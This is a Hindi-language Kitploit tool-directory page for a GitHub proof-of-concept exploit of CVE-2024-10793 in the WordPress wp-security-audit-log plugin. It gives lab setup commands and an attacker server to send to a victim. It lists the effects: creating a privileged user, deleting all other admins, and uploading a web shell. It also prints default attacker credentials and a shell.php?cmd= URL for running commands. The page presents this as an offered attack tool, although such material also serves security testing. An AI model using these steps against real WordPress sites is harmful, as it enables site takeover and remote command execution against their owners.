Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-10793 — CVE-2024-10793 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो WordPress wp-security-audit-log प्लगइन को लक्षित करता है। क्राफ्टेड HTTP अनुरोधों के माध्यम से खाता अधिग्रहण, विशेषाधिकार प्राप्त उपयोगकर्ता निर्माण, शेल अपलोड और एडमिन हेरफेर प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/mahajian/cve-2024-10793
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेलोड डेवलपमेंट
GitHubmahajian/cve-2024-10793

CVE-2024-10793

CVE-2024-10793 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो WordPress wp-security-audit-log प्लगइन को लक्षित करता है। क्राफ्टेड HTTP अनुरोधों के माध्यम से खाता अधिग्रहण, विशेषाधिकार प्राप्त उपयोगकर्ता निर्माण, शेल अपलोड और एडमिन हेरफेर प्रदर्शित करता है।

रिपॉजिटरी देखें
2111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-10793 PoC

इन पंक्तियों को अपनी hosts फ़ाइल में सेट करें:

root@kitploit:~
127.0.0.1  goodcms.lab
127.0.0.1  attacker.com

डॉकर का उपयोग करके वर्डप्रेस लॉन्च करें:

root@kitploit:~
$ sudo systemctl start docker
$ sudo docker-compose up -d

http://goodcms.lab:2121 खोलें और वर्डप्रेस स्थापना चरण करें। वर्डप्रेस में wp-security-audit-log.5.2.1 या उससे पुराने संस्करण स्थापित करें।

हमलावर सर्वर लॉन्च करें:

root@kitploit:~
$ php -S 0:9091 -t ./exploit

http://attacker.com को पीड़ित को भेजें और बिंगो!

शोषण प्रभाव:

  • विशेषाधिकार प्राप्त उपयोगकर्ता जोड़ें।
  • वर्तमान व्यवस्थापक प्रोफ़ाइल बदलें।
  • हैकर को छोड़कर सभी व्यवस्थापक हटाएं :)
  • शैल अपलोड
  • लॉगआउट

वैकल्पिक पाठ

खाता अधिग्रहण और विशेषाधिकार प्राप्त उपयोगकर्ता बनाना Poc: शोषण के बाद हमलावर क्रेडेंशियल: { email: [email protected], username: amin, password: 123456 } (आप xpl.js कोड से बदल सकते हैं।)

शैल कमांड चलाएँ: http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id

वैकल्पिक पाठ

टूल डाउनलोड करें